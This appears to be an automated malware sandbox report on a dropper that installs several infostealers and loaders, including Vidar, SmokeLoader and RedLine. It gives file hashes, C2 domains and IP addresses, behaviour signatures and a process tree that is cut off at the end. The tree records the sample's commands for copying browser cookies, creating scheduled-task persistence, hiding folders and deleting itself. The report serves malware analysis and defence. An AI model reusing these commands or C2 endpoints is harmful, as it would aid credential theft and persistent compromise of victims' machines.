Resubmissions

13-08-2021 10:16

210813-wpta271jdx 10

08-08-2021 23:00

210808-fgs5g9pxfs 10

07-08-2021 23:12

210807-g2jw1lmd4a 10

07-08-2021 16:10

210807-51nhct4kfx 10

06-08-2021 23:43

210806-gc2271nxwj 10

06-08-2021 06:00

210806-f443x39x8a 10

05-08-2021 17:08

210805-97y6banvvx 10

04-08-2021 17:25

210804-hkxx2ntr8x 10

04-08-2021 12:12

210804-rjbg4b4y7n 10

03-08-2021 17:12

210803-r2h7ytjwqj 10

Analysis

  • max time kernel
    156s
  • max time network
    1811s
  • platform
    windows10_x64
  • resource
    win10v20210410
  • submitted
    28-07-2021 23:45

General

  • Target

    8 (15).exe

  • Size

    3.0MB

  • MD5

    bb072cad921aa5ce8b97706ce01bc570

  • SHA1

    18bf034906c1341b7817e7361ad27a4425d820bd

  • SHA256

    817a50d00909383bbef41e6f4e61b527d55f0873bcf745b29dbba75f52fe2e97

  • SHA512

    d40e5f77d882ed29bd9de5a6848072e2f81cd02176955e2b1a4aedcdf4eb687d77bebe33cef0c7d702bc828181755f86e2564523d476adbb785f396a5ce1d474

Malware Config

Extracted

Family

vidar

Version

39.6

Botnet

933

C2

https://sslamlssa1.tumblr.com/

Attributes
  • profile_id

    933

Extracted

Family

smokeloader

Version

2020

C2

http://conceitosseg.com/upload/

http://integrasidata.com/upload/

http://ozentekstil.com/upload/

http://finbelportal.com/upload/

http://telanganadigital.com/upload/

http://readinglistforjuly1.xyz/

http://readinglistforjuly2.xyz/

http://readinglistforjuly3.xyz/

http://readinglistforjuly4.xyz/

http://readinglistforjuly5.xyz/

http://readinglistforjuly6.xyz/

http://readinglistforjuly7.xyz/

http://readinglistforjuly8.xyz/

http://readinglistforjuly9.xyz/

http://readinglistforjuly10.xyz/

http://readinglistforjuly1.site/

http://readinglistforjuly2.site/

http://readinglistforjuly3.site/

http://readinglistforjuly4.site/

http://readinglistforjuly5.site/

rc4.i32
rc4.i32
rc4.i32
rc4.i32

Extracted

Family

redline

Botnet

1k_TEST

C2

86.106.181.209:18845

Extracted

Family

redline

Botnet

NEW_5k

C2

86.106.181.209:18845

Extracted

Family

redline

Botnet

28_7_r

C2

zertypelil.xyz:80

Extracted

Family

vidar

Version

39.8

Botnet

865

C2

https://xeronxikxxx.tumblr.com/

Attributes
  • profile_id

    865

Extracted

Family

metasploit

Version

windows/single_exec

Signatures

  • Contains code to disable Windows Defender 2 IoCs

    A .NET executable tasked with disabling Windows Defender capabilities such as realtime monitoring, blocking at first seen, etc.

  • Glupteba

    Glupteba is a modular loader written in Golang with various components.

  • Glupteba Payload 2 IoCs
  • LimeRAT

    Simple yet powerful RAT for Windows machines written in .NET.

  • MetaSploit

    Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.

  • Modifies Windows Defender Real-time Protection settings 3 TTPs
  • Process spawned unexpected child process 2 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine Payload 7 IoCs
  • SmokeLoader

    Modular backdoor trojan in use since 2014.

  • Socelars

    Socelars is an infostealer targeting browser cookies and credit card credentials.

  • Socelars Payload 2 IoCs
  • Suspicious use of NtCreateProcessExOtherParentProcess 1 IoCs
  • Tofsee

    Backdoor/botnet which carries out malicious activities based on commands from a C2 server.

  • Vidar

    Vidar is an infostealer based on Arkei stealer.

  • suricata: ET MALWARE GCleaner Downloader Activity M1
  • suricata: ET MALWARE Generic Password Stealer User Agent Detected (RookIE)
  • suricata: ET MALWARE Potential Dridex.Maldoc Minimal Executable Request
  • suricata: ET MALWARE Suspicious Zipped Filename in Outbound POST Request (Passwords.txt)
  • suricata: ET MALWARE Vidar/Arkei Stealer Client Data Upload
  • suricata: ET MALWARE Vidar/Arkei/Megumin/Oski Stealer Data Exfil
  • suricata: ET MALWARE Win32/Kelihos.F exe Download 2
  • Deletes shadow copies 2 TTPs

    Ransomware often targets backup files to inhibit system recovery.

  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
  • Vidar Stealer 4 IoCs
  • ASPack v2.12-2.42 9 IoCs

    Detects executables packed with ASPack v2.12-2.42

  • Creates new service(s) 1 TTPs
  • Downloads MZ/PE file
  • Executes dropped EXE 42 IoCs
  • Modifies Windows Firewall 1 TTPs
  • UPX packed file 2 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • VMProtect packed file 1 IoCs

    Detects executables packed with VMProtect commercial packer.

  • Checks BIOS information in registry 2 TTPs 2 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Loads dropped DLL 9 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Themida packer 1 IoCs

    Detects Themida, an advanced Windows software protection system.

  • Adds Run key to start application 2 TTPs 1 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Checks whether UAC is enabled 1 TTPs 1 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 8 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 2 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs
  • Suspicious use of SetThreadContext 5 IoCs
  • autoit_exe 2 IoCs

    AutoIT scripts compiled to PE executables.

  • Drops file in Program Files directory 5 IoCs
  • Launches sc.exe

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 10 IoCs
  • Checks SCSI registry key(s) 3 TTPs 3 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 4 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 9 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Delays execution with timeout.exe 6 IoCs
  • Interacts with shadow copies 2 TTPs 1 IoCs

    Shadow copies are often targeted by ransomware to inhibit system recovery.

  • Kills process with taskkill 8 IoCs
  • Modifies data under HKEY_USERS 5 IoCs
  • Modifies registry class 20 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: MapViewOfSection 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 15 IoCs
  • Suspicious use of SendNotifyMessage 10 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of UnmapMainImage 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Views/modifies file attributes 1 TTPs 4 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\8 (15).exe
    "C:\Users\Admin\AppData\Local\Temp\8 (15).exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2016
    • C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
      "C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"
      2⤵
      • Executes dropped EXE
      • Suspicious use of WriteProcessMemory
      PID:2884
      • C:\Users\Admin\AppData\Local\Temp\7zS44B39E74\setup_install.exe
        "C:\Users\Admin\AppData\Local\Temp\7zS44B39E74\setup_install.exe"
        3⤵
        • Executes dropped EXE
        • Loads dropped DLL
        • Suspicious use of WriteProcessMemory
        PID:2980
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c sonia_1.exe
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:3532
          • C:\Users\Admin\AppData\Local\Temp\7zS44B39E74\sonia_1.exe
            sonia_1.exe
            5⤵
            • Executes dropped EXE
            • Suspicious use of WriteProcessMemory
            PID:2112
            • C:\Users\Admin\AppData\Local\Temp\7zS44B39E74\sonia_1.exe
              "C:\Users\Admin\AppData\Local\Temp\7zS44B39E74\sonia_1.exe" -a
              6⤵
                PID:3984
          • C:\Windows\SysWOW64\cmd.exe
            C:\Windows\system32\cmd.exe /c sonia_3.exe
            4⤵
            • Suspicious use of WriteProcessMemory
            PID:2160
            • C:\Users\Admin\AppData\Local\Temp\7zS44B39E74\sonia_3.exe
              sonia_3.exe
              5⤵
              • Executes dropped EXE
              PID:804
              • C:\Windows\SysWOW64\WerFault.exe
                C:\Windows\SysWOW64\WerFault.exe -u -p 804 -s 908
                6⤵
                • Suspicious use of NtCreateProcessExOtherParentProcess
                • Program crash
                • Suspicious use of AdjustPrivilegeToken
                PID:1952
          • C:\Windows\SysWOW64\cmd.exe
            C:\Windows\system32\cmd.exe /c sonia_2.exe
            4⤵
            • Suspicious use of WriteProcessMemory
            PID:732
            • C:\Users\Admin\AppData\Local\Temp\7zS44B39E74\sonia_2.exe
              sonia_2.exe
              5⤵
              • Executes dropped EXE
              • Loads dropped DLL
              • Checks SCSI registry key(s)
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious behavior: MapViewOfSection
              PID:3852
          • C:\Windows\SysWOW64\cmd.exe
            C:\Windows\system32\cmd.exe /c sonia_4.exe
            4⤵
            • Suspicious use of WriteProcessMemory
            PID:3960
            • C:\Users\Admin\AppData\Local\Temp\7zS44B39E74\sonia_4.exe
              sonia_4.exe
              5⤵
              • Executes dropped EXE
              • Suspicious use of AdjustPrivilegeToken
              PID:3152
          • C:\Windows\SysWOW64\cmd.exe
            C:\Windows\system32\cmd.exe /c sonia_5.exe
            4⤵
            • Suspicious use of WriteProcessMemory
            PID:3184
            • C:\Users\Admin\AppData\Local\Temp\7zS44B39E74\sonia_5.exe
              sonia_5.exe
              5⤵
              • Executes dropped EXE
              PID:1732
              • C:\Users\Admin\Documents\EuqcS1EIf84cRF_TlodKMjLh.exe
                "C:\Users\Admin\Documents\EuqcS1EIf84cRF_TlodKMjLh.exe"
                6⤵
                  PID:4924
                  • C:\Users\Admin\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe
                    "C:\Users\Admin\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe" __IRAOFF:1798690 "__IRAFN:C:\Users\Admin\Documents\EuqcS1EIf84cRF_TlodKMjLh.exe" "__IRCT:3" "__IRTSS:0" "__IRSID:S-1-5-21-3686645723-710336880-414668232-1000"
                    7⤵
                    • Executes dropped EXE
                    • Loads dropped DLL
                    • Suspicious use of SetWindowsHookEx
                    PID:3180
                    • C:\Users\Admin\AppData\Roaming\Sentry Framework\smartmap.exe
                      "C:\Users\Admin\AppData\Roaming\Sentry Framework\smartmap.exe"
                      8⤵
                        PID:5832
                        • C:\Windows\SysWOW64\cmd.exe
                          "C:\Windows\System32\cmd.exe" /c taskkill /im smartmap.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Roaming\Sentry Framework\smartmap.exe" & del C:\ProgramData\*.dll & exit
                          9⤵
                            PID:4152
                            • C:\Windows\SysWOW64\taskkill.exe
                              taskkill /im smartmap.exe /f
                              10⤵
                              • Kills process with taskkill
                              PID:1304
                            • C:\Windows\SysWOW64\timeout.exe
                              timeout /t 6
                              10⤵
                              • Delays execution with timeout.exe
                              PID:8
                    • C:\Users\Admin\Documents\MEe1l_yBGogoaaLaTsJLXQw7.exe
                      "C:\Users\Admin\Documents\MEe1l_yBGogoaaLaTsJLXQw7.exe"
                      6⤵
                      • Executes dropped EXE
                      • Suspicious use of SetThreadContext
                      PID:4904
                      • C:\Users\Admin\Documents\MEe1l_yBGogoaaLaTsJLXQw7.exe
                        C:\Users\Admin\Documents\MEe1l_yBGogoaaLaTsJLXQw7.exe
                        7⤵
                        • Executes dropped EXE
                        PID:4188
                    • C:\Users\Admin\Documents\yPHQr_K50pN27CQ4YaubUdSG.exe
                      "C:\Users\Admin\Documents\yPHQr_K50pN27CQ4YaubUdSG.exe"
                      6⤵
                      • Executes dropped EXE
                      PID:4896
                      • C:\Users\Admin\Documents\yPHQr_K50pN27CQ4YaubUdSG.exe
                        "C:\Users\Admin\Documents\yPHQr_K50pN27CQ4YaubUdSG.exe"
                        7⤵
                          PID:5668
                      • C:\Users\Admin\Documents\yQLzIUbL97rPldSRhFS0Mwu5.exe
                        "C:\Users\Admin\Documents\yQLzIUbL97rPldSRhFS0Mwu5.exe"
                        6⤵
                          PID:4992
                          • C:\Users\Admin\AppData\Local\Temp\11111.exe
                            C:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                            7⤵
                              PID:5640
                            • C:\Users\Admin\AppData\Local\Temp\11111.exe
                              C:\Users\Admin\AppData\Local\Temp\11111.exe /DeleteCookiesWildcard "*.facebook.com"
                              7⤵
                                PID:5380
                              • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                7⤵
                                • Checks computer location settings
                                PID:1732
                              • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /DeleteCookiesWildcard "*.facebook.com"
                                7⤵
                                  PID:3816
                                • C:\Users\Admin\AppData\Local\Temp\22222.exe
                                  C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                  7⤵
                                    PID:5856
                                  • C:\Users\Admin\AppData\Local\Temp\22222.exe
                                    C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /DeleteCookiesWildcard "*.facebook.com"
                                    7⤵
                                      PID:5988
                                    • C:\Users\Admin\AppData\Local\Temp\22222.exe
                                      C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                      7⤵
                                        PID:5460
                                      • C:\Users\Admin\AppData\Local\Temp\22222.exe
                                        C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /DeleteCookiesWildcard "*.facebook.com"
                                        7⤵
                                          PID:3500
                                      • C:\Users\Admin\Documents\BWMF1jLVZjr7CG2SRs6qXxfw.exe
                                        "C:\Users\Admin\Documents\BWMF1jLVZjr7CG2SRs6qXxfw.exe"
                                        6⤵
                                        • Executes dropped EXE
                                        PID:4984
                                      • C:\Users\Admin\Documents\Khj44aHyn8WpFjhNhfhU6Ggd.exe
                                        "C:\Users\Admin\Documents\Khj44aHyn8WpFjhNhfhU6Ggd.exe"
                                        6⤵
                                        • Executes dropped EXE
                                        PID:4936
                                        • C:\Windows\SYSTEM32\schtasks.exe
                                          schtasks /create /f /sc MINUTE /mo 5 /RL LIMITED /tn UDMR /tr "'C:\ProgramData\Provisioning\settings.exe'"
                                          7⤵
                                          • Creates scheduled task(s)
                                          PID:4316
                                        • C:\Windows\SYSTEM32\cmd.exe
                                          cmd /c attrib +H +S "C:\ProgramData\\Provisioning" & attrib +H +S "C:\ProgramData\\Provisioning\*" /S /D
                                          7⤵
                                            PID:3492
                                            • C:\Windows\system32\attrib.exe
                                              attrib +H +S "C:\ProgramData\\Provisioning"
                                              8⤵
                                              • Views/modifies file attributes
                                              PID:4576
                                            • C:\Windows\system32\attrib.exe
                                              attrib +H +S "C:\ProgramData\\Provisioning\*" /S /D
                                              8⤵
                                              • Views/modifies file attributes
                                              PID:5336
                                          • C:\ProgramData\Provisioning\settings.exe
                                            "C:\ProgramData\Provisioning\settings.exe"
                                            7⤵
                                              PID:4616
                                              • C:\Windows\SYSTEM32\schtasks.exe
                                                schtasks /create /f /sc MINUTE /mo 5 /RL LIMITED /tn UDMR /tr "'C:\ProgramData\Provisioning\settings.exe'"
                                                8⤵
                                                • Creates scheduled task(s)
                                                PID:5580
                                              • C:\Windows\SYSTEM32\cmd.exe
                                                cmd /c attrib +H +S "C:\ProgramData\\Provisioning" & attrib +H +S "C:\ProgramData\\Provisioning\*" /S /D
                                                8⤵
                                                  PID:5688
                                                  • C:\Windows\system32\attrib.exe
                                                    attrib +H +S "C:\ProgramData\\Provisioning"
                                                    9⤵
                                                    • Views/modifies file attributes
                                                    PID:3584
                                                  • C:\Windows\system32\attrib.exe
                                                    attrib +H +S "C:\ProgramData\\Provisioning\*" /S /D
                                                    9⤵
                                                    • Views/modifies file attributes
                                                    PID:4104
                                            • C:\Users\Admin\Documents\vH7MC2BPtMClGm7gTTGuhFrG.exe
                                              "C:\Users\Admin\Documents\vH7MC2BPtMClGm7gTTGuhFrG.exe"
                                              6⤵
                                              • Executes dropped EXE
                                              • Suspicious use of SetThreadContext
                                              PID:4484
                                              • C:\Users\Admin\Documents\vH7MC2BPtMClGm7gTTGuhFrG.exe
                                                C:\Users\Admin\Documents\vH7MC2BPtMClGm7gTTGuhFrG.exe
                                                7⤵
                                                • Executes dropped EXE
                                                PID:4604
                                            • C:\Users\Admin\Documents\eqzegAwF8_d8yYhZBNQ_NNwx.exe
                                              "C:\Users\Admin\Documents\eqzegAwF8_d8yYhZBNQ_NNwx.exe"
                                              6⤵
                                              • Executes dropped EXE
                                              PID:4172
                                            • C:\Users\Admin\Documents\WdVnb89WQ_sg3W0Zi4LgYWj9.exe
                                              "C:\Users\Admin\Documents\WdVnb89WQ_sg3W0Zi4LgYWj9.exe"
                                              6⤵
                                              • Executes dropped EXE
                                              • Suspicious use of FindShellTrayWindow
                                              • Suspicious use of SendNotifyMessage
                                              PID:956
                                              • C:\Users\Public\run.exe
                                                C:\Users\Public\run.exe
                                                7⤵
                                                • Executes dropped EXE
                                                PID:5496
                                                • C:\Users\Public\run.exe
                                                  C:\Users\Public\run.exe
                                                  8⤵
                                                    PID:4544
                                                    • C:\Windows\SysWOW64\cmd.exe
                                                      cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Public\run.exe"
                                                      9⤵
                                                        PID:4360
                                                        • C:\Windows\SysWOW64\timeout.exe
                                                          timeout /T 10 /NOBREAK
                                                          10⤵
                                                          • Delays execution with timeout.exe
                                                          PID:5512
                                                • C:\Users\Admin\Documents\yHIkK8943wl9OfrEv0DqcnpS.exe
                                                  "C:\Users\Admin\Documents\yHIkK8943wl9OfrEv0DqcnpS.exe"
                                                  6⤵
                                                  • Executes dropped EXE
                                                  PID:4212
                                                  • C:\Users\Admin\Documents\yHIkK8943wl9OfrEv0DqcnpS.exe
                                                    C:\Users\Admin\Documents\yHIkK8943wl9OfrEv0DqcnpS.exe
                                                    7⤵
                                                      PID:5796
                                                  • C:\Users\Admin\Documents\CKVTw28SJjIVJm73w8qk4FNi.exe
                                                    "C:\Users\Admin\Documents\CKVTw28SJjIVJm73w8qk4FNi.exe"
                                                    6⤵
                                                    • Executes dropped EXE
                                                    PID:3984
                                                    • C:\Windows\SysWOW64\cmd.exe
                                                      cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Admin\Documents\CKVTw28SJjIVJm73w8qk4FNi.exe"
                                                      7⤵
                                                        PID:5476
                                                        • C:\Windows\SysWOW64\timeout.exe
                                                          timeout /T 10 /NOBREAK
                                                          8⤵
                                                          • Delays execution with timeout.exe
                                                          PID:6052
                                                    • C:\Users\Admin\Documents\dTGQ0fJ3IXssHqLzNJ75X44R.exe
                                                      "C:\Users\Admin\Documents\dTGQ0fJ3IXssHqLzNJ75X44R.exe"
                                                      6⤵
                                                      • Executes dropped EXE
                                                      PID:2188
                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 2188 -s 656
                                                        7⤵
                                                        • Program crash
                                                        PID:6020
                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 2188 -s 680
                                                        7⤵
                                                        • Program crash
                                                        PID:4840
                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 2188 -s 684
                                                        7⤵
                                                        • Program crash
                                                        PID:5252
                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 2188 -s 696
                                                        7⤵
                                                        • Program crash
                                                        PID:3500
                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 2188 -s 1156
                                                        7⤵
                                                        • Program crash
                                                        PID:4924
                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 2188 -s 1128
                                                        7⤵
                                                        • Program crash
                                                        PID:5128
                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 2188 -s 1168
                                                        7⤵
                                                        • Program crash
                                                        PID:5312
                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 2188 -s 1204
                                                        7⤵
                                                        • Program crash
                                                        PID:4140
                                                      • C:\Windows\SysWOW64\cmd.exe
                                                        "C:\Windows\System32\cmd.exe" /c taskkill /im "dTGQ0fJ3IXssHqLzNJ75X44R.exe" /f & erase "C:\Users\Admin\Documents\dTGQ0fJ3IXssHqLzNJ75X44R.exe" & exit
                                                        7⤵
                                                          PID:4056
                                                          • C:\Windows\SysWOW64\taskkill.exe
                                                            taskkill /im "dTGQ0fJ3IXssHqLzNJ75X44R.exe" /f
                                                            8⤵
                                                            • Kills process with taskkill
                                                            PID:4108
                                                      • C:\Users\Admin\Documents\cEvMb5a7MRH_eEvdFZ3xgd9Y.exe
                                                        "C:\Users\Admin\Documents\cEvMb5a7MRH_eEvdFZ3xgd9Y.exe"
                                                        6⤵
                                                        • Executes dropped EXE
                                                        PID:2088
                                                        • C:\Users\Admin\Documents\cEvMb5a7MRH_eEvdFZ3xgd9Y.exe
                                                          "C:\Users\Admin\Documents\cEvMb5a7MRH_eEvdFZ3xgd9Y.exe" -a
                                                          7⤵
                                                          • Executes dropped EXE
                                                          PID:5260
                                                      • C:\Users\Admin\Documents\iKLcseVOiSSSGBOER13CtRMJ.exe
                                                        "C:\Users\Admin\Documents\iKLcseVOiSSSGBOER13CtRMJ.exe"
                                                        6⤵
                                                        • Executes dropped EXE
                                                        PID:4824
                                                        • C:\Windows\SysWOW64\cmd.exe
                                                          "C:\Windows\System32\cmd.exe" /c start /I "" "C:\Users\Admin\AppData\Local\Temp\5948670860.exe"
                                                          7⤵
                                                            PID:4416
                                                            • C:\Users\Admin\AppData\Local\Temp\5948670860.exe
                                                              "C:\Users\Admin\AppData\Local\Temp\5948670860.exe"
                                                              8⤵
                                                                PID:3472
                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                  "C:\Windows\System32\cmd.exe" /c taskkill /im 5948670860.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\5948670860.exe" & del C:\ProgramData\*.dll & exit
                                                                  9⤵
                                                                    PID:5468
                                                                    • C:\Windows\SysWOW64\taskkill.exe
                                                                      taskkill /im 5948670860.exe /f
                                                                      10⤵
                                                                      • Kills process with taskkill
                                                                      PID:4580
                                                                    • C:\Windows\SysWOW64\timeout.exe
                                                                      timeout /t 6
                                                                      10⤵
                                                                      • Delays execution with timeout.exe
                                                                      PID:6000
                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                "C:\Windows\System32\cmd.exe" /c start /I "" "C:\Users\Admin\AppData\Local\Temp\1210149608.exe"
                                                                7⤵
                                                                  PID:5560
                                                                  • C:\Users\Admin\AppData\Local\Temp\1210149608.exe
                                                                    "C:\Users\Admin\AppData\Local\Temp\1210149608.exe"
                                                                    8⤵
                                                                      PID:4740
                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                    "C:\Windows\System32\cmd.exe" /c taskkill /im "iKLcseVOiSSSGBOER13CtRMJ.exe" /f & erase "C:\Users\Admin\Documents\iKLcseVOiSSSGBOER13CtRMJ.exe" & exit
                                                                    7⤵
                                                                      PID:5692
                                                                      • C:\Windows\SysWOW64\taskkill.exe
                                                                        taskkill /im "iKLcseVOiSSSGBOER13CtRMJ.exe" /f
                                                                        8⤵
                                                                        • Kills process with taskkill
                                                                        PID:4508
                                                                  • C:\Users\Admin\Documents\fQjhIvQw6hy8jk9iYag7F_mY.exe
                                                                    "C:\Users\Admin\Documents\fQjhIvQw6hy8jk9iYag7F_mY.exe"
                                                                    6⤵
                                                                    • Executes dropped EXE
                                                                    • Suspicious use of SetThreadContext
                                                                    PID:764
                                                                    • C:\Users\Admin\Documents\fQjhIvQw6hy8jk9iYag7F_mY.exe
                                                                      C:\Users\Admin\Documents\fQjhIvQw6hy8jk9iYag7F_mY.exe
                                                                      7⤵
                                                                      • Executes dropped EXE
                                                                      PID:4496
                                                                  • C:\Users\Admin\Documents\ub1wylj8RamKynBE6QAAL92B.exe
                                                                    "C:\Users\Admin\Documents\ub1wylj8RamKynBE6QAAL92B.exe"
                                                                    6⤵
                                                                    • Executes dropped EXE
                                                                    PID:4932
                                                                    • C:\Users\Admin\Documents\ub1wylj8RamKynBE6QAAL92B.exe
                                                                      "C:\Users\Admin\Documents\ub1wylj8RamKynBE6QAAL92B.exe"
                                                                      7⤵
                                                                        PID:5492
                                                                    • C:\Users\Admin\Documents\4kBFi8r1yRXpBcKEWzfBBs21.exe
                                                                      "C:\Users\Admin\Documents\4kBFi8r1yRXpBcKEWzfBBs21.exe"
                                                                      6⤵
                                                                      • Executes dropped EXE
                                                                      PID:1232
                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                        "C:\Windows\System32\cmd.exe" /c taskkill /im 4kBFi8r1yRXpBcKEWzfBBs21.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\Documents\4kBFi8r1yRXpBcKEWzfBBs21.exe" & del C:\ProgramData\*.dll & exit
                                                                        7⤵
                                                                          PID:5916
                                                                          • C:\Windows\System32\Conhost.exe
                                                                            \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                            8⤵
                                                                            • Loads dropped DLL
                                                                            • Modifies registry class
                                                                            • Suspicious behavior: EnumeratesProcesses
                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                            • Suspicious use of WriteProcessMemory
                                                                            PID:2372
                                                                          • C:\Windows\SysWOW64\taskkill.exe
                                                                            taskkill /im 4kBFi8r1yRXpBcKEWzfBBs21.exe /f
                                                                            8⤵
                                                                            • Kills process with taskkill
                                                                            PID:5284
                                                                          • C:\Windows\SysWOW64\timeout.exe
                                                                            timeout /t 6
                                                                            8⤵
                                                                            • Delays execution with timeout.exe
                                                                            PID:4432
                                                                      • C:\Users\Admin\Documents\igoB84wg1ANPL8BTGf2hWtIL.exe
                                                                        "C:\Users\Admin\Documents\igoB84wg1ANPL8BTGf2hWtIL.exe"
                                                                        6⤵
                                                                        • Executes dropped EXE
                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                        PID:1744
                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                          cmd.exe /c taskkill /f /im chrome.exe
                                                                          7⤵
                                                                            PID:5956
                                                                            • C:\Windows\SysWOW64\taskkill.exe
                                                                              taskkill /f /im chrome.exe
                                                                              8⤵
                                                                              • Kills process with taskkill
                                                                              PID:5264
                                                                        • C:\Users\Admin\Documents\i8caDtJyTo9d4eUq4R8LbwDI.exe
                                                                          "C:\Users\Admin\Documents\i8caDtJyTo9d4eUq4R8LbwDI.exe"
                                                                          6⤵
                                                                          • Executes dropped EXE
                                                                          PID:3692
                                                                          • C:\Windows\System32\cmd.exe
                                                                            "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Local\Temp\services64.exe"' & exit
                                                                            7⤵
                                                                              PID:5532
                                                                              • C:\Windows\system32\schtasks.exe
                                                                                schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Local\Temp\services64.exe"'
                                                                                8⤵
                                                                                • Creates scheduled task(s)
                                                                                PID:6096
                                                                            • C:\Users\Admin\AppData\Local\Temp\services64.exe
                                                                              "C:\Users\Admin\AppData\Local\Temp\services64.exe"
                                                                              7⤵
                                                                                PID:5744
                                                                                • C:\Windows\System32\cmd.exe
                                                                                  "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Local\Temp\services64.exe"' & exit
                                                                                  8⤵
                                                                                    PID:3044
                                                                                    • C:\Windows\system32\schtasks.exe
                                                                                      schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Local\Temp\services64.exe"'
                                                                                      9⤵
                                                                                      • Creates scheduled task(s)
                                                                                      PID:4680
                                                                                  • C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
                                                                                    "C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"
                                                                                    8⤵
                                                                                      PID:4392
                                                                                    • C:\Windows\explorer.exe
